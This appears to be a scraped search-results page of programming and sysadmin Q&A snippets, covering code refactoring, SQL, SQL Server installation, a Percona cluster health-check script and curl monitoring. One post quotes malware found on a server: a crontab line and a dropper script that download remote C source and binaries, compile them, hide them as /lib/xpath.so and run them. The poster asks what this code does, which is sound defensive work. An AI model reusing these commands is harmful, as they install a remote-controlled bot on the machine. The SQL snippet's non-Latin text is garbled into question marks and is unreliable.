Search Results

Search found 18220 results on 729 pages for 'null hypothesis'.

Page 536/729 | < Previous Page | 532 533 534 535 536 537 538 539 540 541 542 543  | Next Page >

  • How should I refactor switch statements like this (Switching on type) to be more OO?

    - by Taytay
    I'm seeing some code like this in our code base, and want to refactor it: (Typescript psuedocode follows): class EntityManager{ private findEntityForServerObject(entityType:string, serverObject:any):IEntity { var existingEntity:IEntity = null; switch(entityType) { case Types.UserSetting: existingEntity = this.getUserSettingByUserIdAndSettingName(serverObject.user_id, serverObject.setting_name); break; case Types.Bar: existingEntity = this.getBarByUserIdAndId(serverObject.user_id, serverObject.id); break; //Lots more case statements here... } return existingEntity; } } The downsides of switching on type are self-explanatory. Normally, when switching behavior based on type, I try to push the behavior into subclasses so that I can reduce this to a single method call, and let polymorphism take care of the rest. However, the following two things are giving me pause: 1) I don't want to couple the serverObject with the class that is storing all of these objects. It doesn't know where to look for entities of a certain type. And unfortunately, the identity of a type of ServerObject varies with the type of ServerObject. (So sometimes it's just an ID, other times it's a combination of an id and a uniquely identifying string, etc). And this behavior doesn't belong down there on those subclasses. It is the responsibility of the EntityManager and its delegates. 2) In this case, I can't modify the ServerObject classes since they're plain old data objects. It should be mentioned that I've got other instances of the above method that take a parameter like "IEntity" and proceed to do almost the same thing (but slightly modify the name of the methods they're calling to get the identity of the entity). So, we might have: case Types.Bar: existingEntity = this.getBarByUserIdAndId(entity.getUserId(), entity.getId()); break; So in that case, I can change the entity interface and subclasses, but this isn't behavior that belongs in that class. So, I think that points me to some sort of map. So eventually I will call: private findEntityForServerObject(entityType:string, serverObject:any):IEntity { return aMapOfSomeSort[entityType].findByServerObject(serverObject); } private findEntityForEntity(someEntity:IEntity):IEntity { return aMapOfSomeSort[someEntity.entityType].findByEntity(someEntity); } Which means I need to register some sort of strategy classes/functions at runtime with this map. And again, I darn well better remember to register one for each my my types, or I'll get a runtime exception. Is there a better way to refactor this? I feel like I'm missing something really obvious here.

    Read the article

  • Is this a valid implementation of the repository pattern?

    - by user1578653
    I've been reading up about the repository pattern, with a view to implementing it in my own application. Almost all examples I've found on the internet use some kind of existing framework rather than showing how to implement it 'from scratch'. Here's my first thoughts of how I might implement it - I was wondering if anyone could advise me on whether this is correct? I have two tables, named CONTAINERS and BITS. Each CONTAINER can contain any number of BITs. I represent them as two classes: class Container{ private $bits; private $id; //...and a property for each column in the table... public function __construct(){ $this->bits = array(); } public function addBit($bit){ $this->bits[] = $bit; } //...getters and setters... } class Bit{ //some properties, methods etc... } Each class will have a property for each column in its respective table. I then have a couple of 'repositories' which handle things to do with saving/retrieving these objects from the database: //repository to control saving/retrieving Containers from the database class ContainerRepository{ //inject the bit repository for use later public function __construct($bitRepo){ $this->bitRepo = $bitRepo; } public function getById($id){ //talk directly to Oracle here to all column data into the object //get all the bits in the container $bits = $this->bitRepo->getByContainerId($id); foreach($bits as $bit){ $container->addBit($bit); } //return an instance of Container } public function persist($container){ //talk directly to Oracle here to save it to the database //if its ID is NULL, create a new container in database, otherwise update the existing one //use BitRepository to save each of the Bits inside the Container $bitRepo = $this->bitRepo; foreach($container->bits as $bit){ $bitRepo->persist($bit); } } } //repository to control saving/retrieving Bits from the database class BitRepository{ public function getById($id){} public function getByContainerId($containerId){} public function persist($bit){} } Therefore, the code I would use to get an instance of Container from the database would be: $bitRepo = new BitRepository(); $containerRepo = new ContainerRepository($bitRepo); $container = $containerRepo->getById($id); Or to create a new one and save to the database: $bitRepo = new BitRepository(); $containerRepo = new ContainerRepository($bitRepo); $container = new Container(); $container->setSomeProperty(1); $bit = new Bit(); $container->addBit($bit); $containerRepo->persist($container); Can someone advise me as to whether I have implemented this pattern correctly? Thanks!

    Read the article

  • SQL??“ALL”,????

    - by Todd Bao
    ALL????????????,>ALL?>=ALL?<ALL?<=ALL?=ALL?!=ALL???????????????????WHERE????TRUE?????????“=ALL”?????:select employee_id,last_name,department_id  from hr.employees   where department_id =ALL (select department_id from hr.employees where salary > 16000);EMPLOYEE_ID + LAST_NAME         + DEPARTMENT_ID----------- + ------------------------- + -------------    100 + King            +         90    101 + Kochhar            +         90    102 + De Haan            +         903 rows selected.??????????SALARY??16000????????????????????(???90),???????????????????????,????????????department_id???,????????????,???16000???8000:select employee_id,last_name   from hr.employees   where department_id =ALL (select department_id from hr.employees where salary > 8000);no rows selected????,ALL???????????????????WHERE????TURE,??????,??????salary > 77777:select employee_id,last_name   from hr.employees   where department_id =ALL (select department_id from hr.employees where salary > 77777)/?????????????77777??,??????“where department_id =ALL (???)”??TRUE,?????????????:EMPLOYEE_ID + LAST_NAME----------- + -------------------------    198 + OConnell    199 + Grant    ...   .....    196 + Walsh    197 + Feeney107 rows selected.?????????????>ALL?<ALL?>=ALL?<=ALL?!=ALL??,??????????????,???????“?”??????????????????,?“?”?????????????????????????????:select * from hr.employees where department_id >=ALL (null)/Todd

    Read the article

  • SQL Server 2008 R2 Quiet Installation Failure

    - by pk
    I've downloaded the SQL Server 2008 R2 software from Microsoft and am working on scripting a silent installation. I'm getting the following errors (and the duplicate paste job is not an accident, that's how it shows up for me) The following error occurred: Exception has been thrown by the target of an invocation. Error result: 1152035024 Result facility code: 1194 Result error code: 43216 Please review the summary.txt log for further details The following error occurred: Exception has been thrown by the target of an invocation. Error result: 1152035024 Result facility code: 1194 Result error code: 43216 Please review the summary.txt log for further details Microsoft (R) SQL Server 2008 R2 Setup 10.50.1600.01 This is what shows up in the detailed SQL install log. 2011-02-23 09:53:13 Slp: Running Action: ExecuteInitWorkflow 2011-02-23 09:53:13 Slp: Workflow to execute: 'INITIALIZATION' 2011-02-23 09:53:13 Slp: Error: Action "Microsoft.SqlServer.Configuration.BootstrapExtension.ExecuteWorkflowAction" threw an exception during execution. 2011-02-23 09:53:13 Slp: Microsoft.SqlServer.Setup.Chainer.Workflow.ActionExecutionException: Exception has been thrown by the target of an invocation. ---> System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.ArgumentNullException: Value cannot be null. 2011-02-23 09:53:13 Slp: Parameter name: InstallMediaPath Hopefully someone can help me work through this. Here is a simple version of my PowerShell code. $arguments = @() $arguments += "/q" $arguments += "/ACTION=Install" $arguments += "/FEATURES=SQL,Tools" $arguments += "/INSTANCENAME=MSSQLSERVER" $arguments += "/SQLSVCACCOUNT=`"$NetBIOSDomainName\$SQLServerServiceAccount`"" $arguments += "/SQLSVCPASSWORD=`"$SQLServerServiceAccountPassword`"" $arguments += "/SQLSYSADMINACCOUNTS=`"$NetBIOSDomainName\$SQLSysAdminAccount`"" $arguments += "/AGTSVCACCOUNT=`"$NetBIOSDomainName\$SQLServerAgentAccount`"" $arguments += "/IACCEPTSQLSERVERLICENSETERMS" Start-Process "$SQLServerSetupLocation\setup.exe" -Wait -ArgumentList $arguments -RedirectStandardOutput error.txt

    Read the article

  • xinetd 'connection reset by peer'

    - by ceejayoz
    I'm using percona-clustercheck (which comes with Percona's XtraDB Cluster packages) with xinetd and I'm getting an error when trying to curl the clustercheck service. /usr/bin/clustercheck: #!/bin/bash # # Script to make a proxy (ie HAProxy) capable of monitoring Percona XtraDB Cluster nodes properly # # Author: Olaf van Zandwijk <[email protected]> # Documentation and download: https://github.com/olafz/percona-clustercheck # # Based on the original script from Unai Rodriguez # MYSQL_USERNAME="clustercheckuser" MYSQL_PASSWORD="clustercheckpassword!" ERR_FILE="/dev/null" AVAILABLE_WHEN_DONOR=0 # # Perform the query to check the wsrep_local_state # WSREP_STATUS=`mysql --user=${MYSQL_USERNAME} --password=${MYSQL_PASSWORD} -e "SHOW STATUS LIKE 'wsrep_local_state';" 2>${ERR_FILE} | awk '{if (NR!=1){print $2}}' 2>${ERR_FILE}` if [[ "${WSREP_STATUS}" == "4" ]] || [[ "${WSREP_STATUS}" == "2" && ${AVAILABLE_WHEN_DONOR} == 1 ]] then # Percona XtraDB Cluster node local state is 'Synced' => return HTTP 200 /bin/echo -en "HTTP/1.1 200 OK\r\n" /bin/echo -en "Content-Type: text/plain\r\n" /bin/echo -en "\r\n" /bin/echo -en "Percona XtraDB Cluster Node is synced.\r\n" /bin/echo -en "\r\n" exit 0 else # Percona XtraDB Cluster node local state is not 'Synced' => return HTTP 503 /bin/echo -en "HTTP/1.1 503 Service Unavailable\r\n" /bin/echo -en "Content-Type: text/plain\r\n" /bin/echo -en "\r\n" /bin/echo -en "Percona XtraDB Cluster Node is not synced.\r\n" /bin/echo -en "\r\n" exit 1 fi /etc/xinetd.mysqlchk: # default: on # description: mysqlchk service mysqlchk { # this is a config for xinetd, place it in /etc/xinetd.d/ disable = no flags = REUSE socket_type = stream port = 9200 wait = no user = nobody server = /usr/bin/clustercheck log_on_failure += USERID only_from = 10.0.0.0/8 127.0.0.1 # recommended to put the IPs that need # to connect exclusively (security purposes) per_source = UNLIMITED } When attempting to curl the service, I get a valid response (HTTP 200, text) but a 'connection reset by peer' notice at the end: HTTP/1.1 200 OK Content-Type: text/plain Percona XtraDB Cluster Node is synced. curl: (56) Recv failure: Connection reset by peer Unfortunately, Amazon ELB appears to see this as a failed check, not a succeeded one. How can I get clustercheck to exit gracefully in a manner that curl doesn't see a connection failure?

    Read the article

  • curl http_code of 000

    - by Mikkel Paulson
    I have a shell script that I use to monitor loading times and response codes on my live server cluster. It runs a total of 250 iterations every 5 minutes, distributed across 10 servers and 6 sites. It uses curl with the -w flag to return pertinent information which is then parsed by my shell script: curl -svw 'monitor_load_times %{time_total} %{http_code}' -b 'server=$server' -m 15 -o /dev/null $url 2>&1 This information is then parsed by a graphing script that can display a number of different responses. However, curl will occasionally return a response code of "000". When this happens, it seems to happen multiple times at once despite being distributed over many iterations: What I'm trying to work out is if this is a client-side issue that's skewing my results or if it's actually indicative of a server-side problem affecting my entire cluster. Does 000 mean that the connection was dropped? Database entries corresponding to curl iterations with that response code return "0.000" for the time_total value. All of the search results I've found for curl returning a code of 000 are related to HTTPS being unsupported, but all of my test URLs are HTTP. (The spike in 500 errors is a completely unrelated issue that affected my servers last night.)

    Read the article

  • Is SecureShellz bot a virus? How does it work?

    - by ProGNOMmers
    I'm using a development server in which I found this in the crontab: [...] * * * * * /dev/shm/tmp/.rnd >/dev/null 2>&1 @weekly wget http://stablehost.us/bots/regular.bot -O /dev/shm/tmp/.rnd;chmod +x /dev/shm/tmp/.rnd;/dev/shm/tmp/.rnd [...] http://stablehost.us/bots/regular.bot contents are: #!/bin/sh if [ $(whoami) = "root" ]; then echo y|yum install perl-libwww-perl perl-IO-Socket-SSL openssl-devel zlib1g-dev gcc make echo y|apt-get install libwww-perl apt-get install libio-socket-ssl-perl openssl-devel zlib1g-dev gcc make pkg_add -r wget;pkg_add -r perl;pkg_add -r gcc wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o a a.c;mv a /lib/xpath.so;chmod +x /lib/xpath.so;/lib/xpath.so;rm -rf a.c wget -q http://linksys.secureshellz.net/bots/b -O /lib/xpath.so.1;chmod +x /lib/xpath.so.1;/lib/xpath.so.1 wget -q http://linksys.secureshellz.net/bots/a -O /lib/xpath.so.2;chmod +x /lib/xpath.so.2;/lib/xpath.so.2 exit 1 fi wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o .php a.c;rm -rf a.c;chmod +x .php; ./.php wget -q http://linksys.secureshellz.net/bots/a -O .phpa;chmod +x .phpa; ./.phpa wget -q http://linksys.secureshellz.net/bots/b -O .php_ ;chmod +x .php_;./.php_ I cannot contact the sysadmin for various reasons, so I cannot ask infos about this to him. It seems to me this script downloads some remote C source codes and binaries, compile them and execute them. I am a web developer, so I am not an expert about C language, but watching at the downloaded files it seems to me a bot injected in the cron of the server. Can you give me more infos about what this code does? About its working, its purposes?

    Read the article

  • Moving from ColdFusion 8 to ColdFusion 10 - Migration Fails

    - by XenoFoxx
    After having made several attempts to migrate from a ColdFusion 8 Standard server to a ColdFusion 10 Standard server, it feels like I am "almost" there. I'm using the 64 bit installer from Adobe's website. I'm using a Windows Server 2008 (64 bit) server with IIS 7.0. The installation itself goes smooth and the services start and are running. But at the end of the installation it says "ColdFusion Installed, but with errors" and it generates a log file. The log file reads: Migration Error: : Check that "C:\ColdFusion8" is a valid directory and is an installation of either ColdFusion MX 6 or ColdFusionMX 7 and further down says: Status: WARNING Additional Notes: WARNING - Could not migrate settings from previous version of ColdFusion Custom Action: com.macromedia.ia.action.MigrateColdFusionAction Status: ERROR Additional Notes: ERROR - class com.macromedia.ia.action.MigrateColdFusionAction NonfatalInstallException null The applicationHost.config file has new XML referencing the ColdFusion 10 directory, but IIS is still using ColdFusion 8. I'm also going to guess that the settings in the CF Administrator have not been migrated based on the message in the log above. I've followed the instructions on Adobe's site, including ensuring that ASP.NET, CGI, ISAPI Extensions, and ISAPI Filters are all enabled. I've also enabled IIS 6 Metabase Compatibility even though I don't think it's needed. Has anyone else had similar issues with ColdFusion 10 and IIS 7. Currently I have uninstalled CF 10 and reverted back to

    Read the article

  • Problem with apache + ssl: length mismatch error and ocasional bad request

    - by Ruben Garat
    we migrated a server from slicehost to linode recently, we copied the config from one server to the other. Everything works perfectly except that we get: Occasional errors with "Bad Request", this error is not common, you can use it all day and not see it, and the next day it will happen a lot. apart from that, a lot of the time, event though the request works fine we get some errors. using ssldump we get: New TCP connection #1: myip(39831) <-> develserk(443) 1 1 0.2316 (0.2316) C>S SSLv2 compatible client hello Version 3.1 cipher suites Unknown value 0x39 Unknown value 0x38 Unknown value 0x35 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA TLS_RSA_WITH_3DES_EDE_CBC_SHA SSL2_CK_3DES Unknown value 0x33 Unknown value 0x32 Unknown value 0x2f SSL2_CK_RC2 TLS_RSA_WITH_RC4_128_SHA TLS_RSA_WITH_RC4_128_MD5 SSL2_CK_RC4 TLS_DHE_RSA_WITH_DES_CBC_SHA TLS_DHE_DSS_WITH_DES_CBC_SHA TLS_RSA_WITH_DES_CBC_SHA SSL2_CK_DES TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA TLS_RSA_EXPORT_WITH_DES40_CBC_SHA TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 SSL2_CK_RC2_EXPORT40 TLS_RSA_EXPORT_WITH_RC4_40_MD5 SSL2_CK_RC4_EXPORT40 1 2 0.2429 (0.0112) S>C Handshake ServerHello Version 3.1 session_id[32]= 9a 1e ae c4 5f df 99 47 97 40 42 71 97 eb b9 14 96 2d 11 ac c0 00 15 67 4e f3 7d 65 4e c4 30 e9 cipherSuite Unknown value 0x39 compressionMethod NULL 1 3 0.2429 (0.0000) S>C Handshake Certificate 1 4 0.2429 (0.0000) S>C Handshake ServerKeyExchange 1 5 0.2429 (0.0000) S>C Handshake ServerHelloDone 1 6 0.4965 (0.2536) C>S Handshake ClientKeyExchange 1 7 0.4965 (0.0000) C>S ChangeCipherSpec 1 8 0.4965 (0.0000) C>S Handshake 1 9 0.5040 (0.0075) S>C ChangeCipherSpec 1 10 0.5040 (0.0000) S>C Handshake ERROR: Length mismatch from the apache error.log [Fri Aug 27 14:50:05 2010] [debug] ssl_engine_io.c(1892): OpenSSL: I/O error, 5 bytes expected to read on BIO#b80c1e70 [mem: b8100918] the server is ubuntu 10.04.1 the apache version is 2.2.14-5ubuntu8 the openssl version is 0.9.8k-7ubuntu8

    Read the article

  • Cannot delete a SharePoint web application

    - by Vijay
    What I have? I have normal web application and it has 3 site collections with name, "PDirectory". Other than this I have only Central administration web application in the farm. What I want? I want to delete that web application, "PDirectory". What problem am I facing? I am not able to delete the web application. I get below error when I try to delete it but, the site collections got deleted! Error: An object in the SharePoint administrative framework, "SPWebApplication Name=XXX Parent=SPWebService", could not be deleted because other objects depend on it. Update all of these dependants to point to null or different objects and retry this operation. The dependant objects are as follows: SPFarm Name=SharePoint_Config SPFarm Name=SharePoint_Config at Microsoft.SharePoint.Administration.SPConfigurationDatabase.DeleteObject(Guid id) at Microsoft.SharePoint.Administration.SPConfigurationDatabase.DeleteObject(SPPersistedObject obj) at Microsoft.SharePoint.Administration.SPPersistedObject.Delete() at Microsoft.SharePoint.Administration.SPWebApplication.Delete() at Microsoft.SharePoint.ApplicationPages.DeleteWebApplicationPage.BtnSubmit_Click(Object sender, EventArgs e) at System.Web.UI.WebControls.Button.OnClick(EventArgs e) at System.Web.UI.WebControls.Button.RaisePostBackEvent(String eventArgument) at System.Web.UI.WebControls.Button.System.Web.UI.IPostBackEventHandler.RaisePostBackEvent(String eventArgument) at System.Web.UI.Page.RaisePostBackEvent(IPostBackEventHandler sourceControl, String eventArgument) at System.Web.UI.Page.RaisePostBackEvent(NameValueCollection postData) at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) Can somebody tell me how I can delete this web application? Thanks in advance!

    Read the article

  • XRDP errors when trying to use sesman-x11rdp

    - by Nicholas
    I've just installed Ubuntu 11.10 Desktop on an old laptop of mine and I wanted to set it up so I could remote into it from my windows desktop. I've installed XRDP, but when I attempt to login using sesman-x11rdp it logs in, then the window shuts down. I've checked over the logs and here is what I get at the time of login: [20120123-16:49:23] [INFO ] scp thread on sck 8 started successfully [20120123-16:49:23] [INFO ] granted TS access to user nicholas [20120123-16:49:24] [INFO ] starting X11rdp session... [20120123-16:49:24] [CORE ] error starting X server - user nicholas - pid 3869 [20120123-16:49:24] [DEBUG] errno: 2, description: No such file or directory [20120123-16:49:24] [DEBUG] execve parameter list: 11 [20120123-16:49:24] [DEBUG] argv[0] = X11rdp [20120123-16:49:24] [DEBUG] argv[1] = :11 [20120123-16:49:24] [DEBUG] argv[2] = -geometry [20120123-16:49:24] [DEBUG] argv[3] = 1280x720 [20120123-16:49:24] [DEBUG] argv[4] = -depth [20120123-16:49:24] [DEBUG] argv[5] = 16 [20120123-16:49:24] [DEBUG] argv[6] = -bs [20120123-16:49:24] [DEBUG] argv[7] = -ac [20120123-16:49:24] [DEBUG] argv[8] = -nolisten [20120123-16:49:24] [DEBUG] argv[9] = tcp [20120123-16:49:25] [DEBUG] argv[10] = (null) [20120123-16:49:34] [ERROR] X server for display 11 startup timeout [20120123-16:49:34] [ERROR] X server for display 11 startup timeout [20120123-16:49:34] [INFO ] starting xrdp-sessvc - xpid=3869 - wmpid=3868 [20120123-16:49:34] [ERROR] another Xserver is already active on display 11 [20120123-16:49:34] [DEBUG] aborting connection... [20120123-16:49:34] [INFO ] session 3867 - user nicholas - terminated Can anyone point me to the proper way to get this working with x11rdp?

    Read the article

  • Can I configure Wndows NDES server to use Triple DES (3DES) algorithm for PKCS#7 answer encryption?

    - by O.Shevchenko
    I am running SCEP client to enroll certificates on NDES server. If OpenSSL is not in FIPS mode - everything works fine. In FIPS mode i get the following error: pkcs7_unwrap():pkcs7.c:708] error decrypting inner PKCS#7 139968442623728:error:060A60A3:digital envelope routines:FIPS_CIPHERINIT:disabled for fips:fips_enc.c:142: 139968442623728:error:21072077:PKCS7 routines:PKCS7_decrypt:decrypt error:pk7_smime.c:557: That's because NDES server uses DES algorithm to encrypt returned PKCS#7 packet. I used the following debug code: /* Copy enveloped data from PKCS#7 */ bytes = BIO_read(pkcs7bio, buffer, sizeof(buffer)); BIO_write(outbio, buffer, bytes); p7enc = d2i_PKCS7_bio(outbio, NULL); /* Get encryption PKCS#7 algorithm */ enc_alg=p7enc->d.enveloped->enc_data->algorithm; evp_cipher=EVP_get_cipherbyobj(enc_alg->algorithm); printf("evp_cipher->nid = %d\n", evp_cipher->nid); The last string always prints: evp_cipher-nid = 31 defined in openssl-1.0.1c/include/openssl/objects.h #define SN_des_cbc "DES-CBC" #define LN_des_cbc "des-cbc" #define NID_des_cbc 31 I use 3DES algorithm for PKCS7 requests encryption in my code (pscep.enc_alg = (EVP_CIPHER *)EVP_des_ede3_cbc()) and NDES server accepts these requests, but it always returns answer encrypted with DES. Can I configure Wndows NDES server to use Triple DES (3DES) algorithm for PKCS#7 answer encryption?

    Read the article

  • Cannot connect to a VPN server - authentication failed with error code 691

    - by stacker
    When trying to connect to a VPN server, I get the 691 error code on the client, which say: Error Description: 691: The remote connection was denied because the user name and password combination you provided is not recognized, or the selected authentication protocol is not permitted on the remote access server. I validated that the username and password are correct. I also installed a certification to use with the IKEv2 security type. I also validated that the VPN server support security method. But I cannot login. In the server log I get this log: Network Policy Server denied access to a user. The user DomainName\UserName connected from IP address but failed an authentication attempt due to the following reason: The remote connection was denied because the user name and password combination you provided is not recognized, or the selected authentication protocol is not permitted on the remote access server. Any idea of what can I do? Thanks in advance! Log Name: Security Source: Microsoft-Windows-Security-Auditing Date: 12/29/2010 7:12:20 AM Event ID: 6273 Task Category: Network Policy Server Level: Information Keywords: Audit Failure User: N/A Computer: VPN.domain.com Description: Network Policy Server denied access to a user. Contact the Network Policy Server administrator for more information. User: Security ID: domain\Administrator Account Name: domain\Administrator Account Domain: domani Fully Qualified Account Name: domain.com/Users/Administrator Client Machine: Security ID: NULL SID Account Name: - Fully Qualified Account Name: - OS-Version: - Called Station Identifier: 192.168.147.171 Calling Station Identifier: 192.168.147.191 NAS: NAS IPv4 Address: - NAS IPv6 Address: - NAS Identifier: VPN NAS Port-Type: Virtual NAS Port: 0 RADIUS Client: Client Friendly Name: VPN Client IP Address: - Authentication Details: Connection Request Policy Name: Microsoft Routing and Remote Access Service Policy Network Policy Name: All Authentication Provider: Windows Authentication Server: VPN.domain.home Authentication Type: EAP EAP Type: Microsoft: Secured password (EAP-MSCHAP v2) Account Session Identifier: 313933 Logging Results: Accounting information was written to the local log file. Reason Code: 16 Reason: Authentication failed due to a user credentials mismatch. Either the user name provided does not map to an existing user account or the password was incorrect.

    Read the article

  • How to import certificate for Apache + LDAPS?

    - by user101956
    I am trying to get ldaps to work through Apache 2.2.17 (Windows Server 2008). If I use ldap (plain text) my configuration works great. LDAPTrustedGlobalCert CA_DER C:/wamp/certs/Trusted_Root_Certificate.cer LDAPVerifyServerCert Off <Location /> AuthLDAPBindDN "CN=corpsvcatlas,OU=Service Accounts,OU=u00958,OU=00958,DC=hca,DC=corpad,DC=net" AuthLDAPBindPassword ..removed.. AuthLDAPURL "ldaps://gc-hca.corpad.net:3269/dc=hca,dc=corpad,dc=net?sAMAccountName?sub" AuthType Basic AuthName "USE YOUR WINDOWS ACCOUNT" AuthBasicProvider ldap AuthUserFile /dev/null require valid-user </Location> I also tried the other encryption choices besides CA_DER just to be safe, with no luck. Finally, I also needed this with Apache tomcat. For tomcat I used the tomcat JRE and ran a line like this: keytool -import -trustcacerts -keystore cacerts -storepass changeit -noprompt -alias mycert -file Trusted_Root_Certificate.cer After doing the above line ldaps worked greate via tomcat. This lets me know that my certificate is a-ok. Update: Both ldap modules are turned on, since using ldap instead of ldaps works fine. When I run a git clone this is the error returned: C:\Tempgit clone http://eqb9718@localhost/git/Liferay.git Cloning into Liferay... Password: error: The requested URL returned error: 500 while accessing http://eqb9718@loca lhost/git/Liferay.git/info/refs fatal: HTTP request failed access.log has this: 127.0.0.1 - eqb9718 [23/Nov/2011:18:25:12 -0600] "GET /git/Liferay.git/info/refs service=git-upload-pack HTTP/1.1" 500 535 127.0.0.1 - eqb9718 [23/Nov/2011:18:25:33 -0600] "GET /git/Liferay.git/info/refs HTTP/1.1" 500 535 apache_error.log has nothing. Is there any more verbose logging I can turn on or better tests to do?

    Read the article

  • AWStats consumes too much resource, how to disable temporarily

    - by trante
    For some days AWStats takes %10-%20 of my CPU, takes 400-550 MB RAM and works for hours. Maybe my site's traffic became larger so process time takes more time than before or some bugs in program makes this. Anyway I want to disable AWStats temporarily. Maybe I would want to activate it in future. I found that answer. But it gives commands to remove AWStats. I only want to disable it temporarily. My system is Centos 6.3, Plesk 11.5.30 Update #19. I tried to disable cron jobs. I run this # killall awstats.pl I opened # vi /etc/cron.daily/awstats file and I changed it to this: #!/bin/sh #/usr/share/awstats/awstats_updateall.pl now -awstatsprog=/var/www/cgi-bin/awstats/awstats.pl -configdir=/etc/awstats >/dev/null 2>&1 exit 0 After some time I still see that awstats is running. What should I do more to not to awstats run again ? But without removing my files. After changing " /etc/cron.daily/awstats" file awstats doesn't start in daytime. But every night in 03:15 awstats starts again. Because of Plesk auto updates are working at that time, I changed from Plesk. Don't auto update automatically. But it seems like last night at 03:15 awstats started again. Is there any way to stop awstats temporarily except this solution ? Because this solution deletes awstats configs permanently and I don't know how to revert it back in future ? Turn off all AWStats for Plesk 11+ domains #!/bin/bash for i in /var/www/vhosts/*; do echo "Turning off and deleting Stats for" echo `basename $i` /usr/local/psa/admin/bin/webstatmng --unset-configs --stat-prog=awstats --domain-name=`basename $i` /usr/local/psa/admin/bin/webstatmng --clean --stat-prog=awstats --domain-name=`basename $i` done

    Read the article

  • Memcached session manager in Azure: Connection gets forcibly closed

    - by Edgar Pérez
    I am using Memcached Session Manager to handle Tomcat sessions in non-sticky mode. My deployment in Azure consists of a Worker Role with two instances which connect to an Azure VM running my Memcached server. Everything works pretty well, my session is persisted and retrieved by any of the two instances transparently. The problem arises when the session is idle for about 4 minutes; everything points out that the Azure Loadbalancer is closing the spymemcached connection to the VM after some period of inactivity. My MSM configuration is this: <Manager className="de.javakaffee.web.msm.MemcachedBackupSessionManager" memcachedNodes="n1:my-azure-vm.cloudapp.net:11211" sticky="false" sessionBackupAsync="false" sessionBackupTimeout="10000" lockingMode="uriPattern:/path1|/path2" requestUriIgnorePattern=".*\.(ico|png|gif|jpg|css|js|ttf|eot|svg|woff)$" transcoderFactoryClass="de.javakaffee.web.msm.serializer.kryo.KryoTranscoderFactory" customConverter="de.javakaffee.web.msm.serializer.kryo.HibernateCollectionsSerializerFactory"/> The stacktrace printed by the spymemcached client is this: INFO net.spy.memcached.MemcachedConnection: Reconnecting due to exception on {QA sa=/10.194.132.206:13000, #Rops=1, #Wops=0, #iq=0, topRop=net.spy.memcached.protocol.binary.StoreOperationImpl@1d95da8, topWop=null, toWrite=0, interested=1} java.io.IOException: An existing connection was forcibly closed by the remote host at sun.nio.ch.SocketDispatcher.read0(Native Method) at sun.nio.ch.SocketDispatcher.read(Unknown Source) at sun.nio.ch.IOUtil.readIntoNativeBuffer(Unknown Source) at sun.nio.ch.IOUtil.read(Unknown Source) at sun.nio.ch.SocketChannelImpl.read(Unknown Source) at net.spy.memcached.MemcachedConnection.handleReads (MemcachedConnection.java:303) at net.spy.memcached.MemcachedConnection.handleIO (MemcachedConnection.java:264) at net.spy.memcached.MemcachedConnection.handleIO (MemcachedConnection.java:184) at net.spy.memcached.MemcachedClient.run(MemcachedClient.java:1298) Given this idle time limitation in Azure, is there any other way to make MSM work in the azure cloud?

    Read the article

  • ssl_error_rx_record_too_long connection error with SSL site in Firefox

    - by Thomas
    I am trying to set up SSL in Apache but when I go to the server in Firefox I get the following error message: An error occurred during a connection to sludge.home. SSL received a record that exceeded the maximum permissible length. (Error code: ssl_error_rx_record_too_long) My virtual host config file looks like this. <IfDefine SSL> <VirtualHost *:443> ServerName sludge.home SSLEngine on SSLCertificateFile /usr/local/apache/cert/server.crt SSLCertificateKeyFile /usr/local/apache/cert/server.pem SSLProtocol -SSLv2 SSL CipherSuite HIGH:!ADH:!EXP:!MD5:!NULL DocumentRoot "/usr/local/apache/htdocs" ServerAdmin [email protected] <Location /> AuthType Digest AuthName "private area" AuthDigestDomain / AuthDigestProvider file AuthUserFile /usr/local/apache/passwd/digest_pw Require valid-user </Location> <Directory /usr/local/apache/htdocs/bugz> AddHandler cgi-script .cgi Options +Indexes +ExecCGI DirectoryIndex index.cgi AllowOverride Limit FileInfo Indexes </Directory> <Directory /usr/local/apache/htdocs/bugzilla> AddHandler cgi-script .cgi Options +Indexes +ExecCGI DirectoryIndex index.cgi AllowOverride Limit FileInfo Indexes </Directory> <Directory /> Options FollowSymLinks AllowOverride None Order deny,allow Deny from all </Directory> <Directory "/usr/local/apache/htdocs"> Options Indexes FollowSymLinks Allow Override None Order allow,deny Allow from all </Directory> <IfModule dir_module> DirectoryIndex index.html </IfModule> <FilesMatch "^\.ht"> Order allow,deny Deny from all Satisfy All </FilesMatch> </VirtualHost> </IfDefine> A telnet to this server reveals that server is sending plain HTML back. Further more it seems as though mod_ssl is not loaded/working even though when I httpd -l it shows up as being statically compiled in. I have exhausted most avenues I can think of.

    Read the article

  • Oracle 11gR2: NLS_CHARACTERSET accidentally removed with an UPDATE-Query

    - by Marco Nätlitz
    Hi folks, I have a fresh installation of Oracle 11gr2_x64 on CentOS. After the installation I wanted to get productive and started to import my dumps. One of the dumps caused characterset error so I tried to change the systems character-set to the one specified in the dump. I ran a statement like this: UPDATE nls_database_parameters SET parameter='WS....' WHERE parameter=’NLS_CHARACTERSET’; As you can see: I have written the value of the character-set in the parameter column instead of the value column. I guess I was just too much thinking about the problem instead of checking what I am typing there. After the query the parameter "NLS_CHARACTERSET" is gone and the server reports that the characterset is "(null)". I want to put the "NLS_CHARACTERSET" paramater back in the table but don't know how. If I try to do something like this INSERT INTO nls_database_parameters (PARAMETERS, VALUE) VALUES ("NLS_CHARACTERSET", "AL32UTF8"); I get the error: Fehler bei Befehlszeile:1 Spalte:84 Fehlerbericht: *Cause: SQL-Fehler: ORA-00984: Spalte hier nicht zulässig *Action: 00984. 00000 - "column not allowed here" Sorry that the error message is in German but it contains the Oracle error code. Do you have any idea how I can fix that? Thanks and best regards Marco

    Read the article

  • .net Framework won't install on Server 2003 SP2 x64

    - by Yvan JANSSENS
